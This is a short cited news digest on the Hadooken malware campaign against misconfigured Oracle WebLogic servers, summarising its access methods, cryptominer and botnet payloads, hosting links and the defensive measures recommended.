Cybersecurity researchers have uncovered a Linux malware campaign known as Hadooken, targeting misconfigured Oracle WebLogic servers [4].

Description

This campaign exploits vulnerabilities like deserialization flaws and weak credentials to gain initial access. Attackers deploy a backdoor program called Hadooken [4], which includes a cryptocurrency miner and a DDoS botnet known as Tsunami. The malware is dropped into non-persistent directories like /tmp and creates cron jobs for persistence. Defense evasion tactics include Base64-encoded payloads and artifact deletion [3]. The IP address associated with the campaign has been linked to previous cybercriminal groups [4], indicating a potential threat to both Windows and Linux systems [4]. Aeza International LTD and Aeza Group Ltd [3] [7], both bulletproof hosting providers based in Moscow and Frankfurt [3] [7], are involved in cybercrime activities [3], offering shelter to malicious actors [3]. The malware grants attackers full control over compromised endpoints and has traces of ransomware functionality [2]. Organizations are advised to use various security tools to mitigate threats like Hadooken [5], including Infrastructure as Code scanning [1], Cloud Security Posture Management [1], Kubernetes security [1], container security [1], and runtime security monitoring [1]. Understanding the operation of Hadooken malware and implementing proactive security measures are crucial for safeguarding critical systems against evolving cyber threats [1]. Hackers are exploiting weak Oracle WebLogic servers to deploy malware [2], including the Hadooken malware [2] [3] [5] [6], which has been used in a few dozen attacks for cryptocurrency mining and DDoS botnet activities [2]. Cybersecurity researchers observed these attacks and traced the IP addresses of the malware to a UK hosting company registered in Germany and a Russian IP address [2]. Static analysis of the Hadooken binary revealed links to RHOMBUS and NoEscape ransomware [6], although dynamic analysis showed no active use [6]. Shodan search results indicate over 230K internet-connected Weblogic servers [6], with some exposed to attacks due to vulnerabilities and misconfigurations [6].

Conclusion

The Hadooken malware campaign highlights the importance of securing Oracle WebLogic servers to prevent further exploitation by cybercriminals [2]. Organizations must implement proactive security measures to mitigate threats and safeguard critical systems against evolving cyber threats.

References

[1] https://linuxsecurity.com/news/server-security/fighting-back-against-hadooken-malware
[2] https://www.techradar.com/pro/security/oracle-servers-targeted-by-new-linux-malware-to-steal-passwords-crypto
[3] https://thehackernews.com/2024/09/new-linux-malware-campaign-exploits.html
[4] https://www.csoonline.com/article/3520721/new-cryptomining-campaign-infects-weblogic-servers-with-hadooken-malware.html
[5] https://www.darkreading.com/cyberattacks-data-breaches/hadooken-malware-targets-weblogic-servers
[6] https://securityaffairs.com/168364/malware/hadooken-targets-oracle-weblogic-servers.html
[7] https://blog.netmanageit.com/hadooken-malware-targets-weblogic-applications/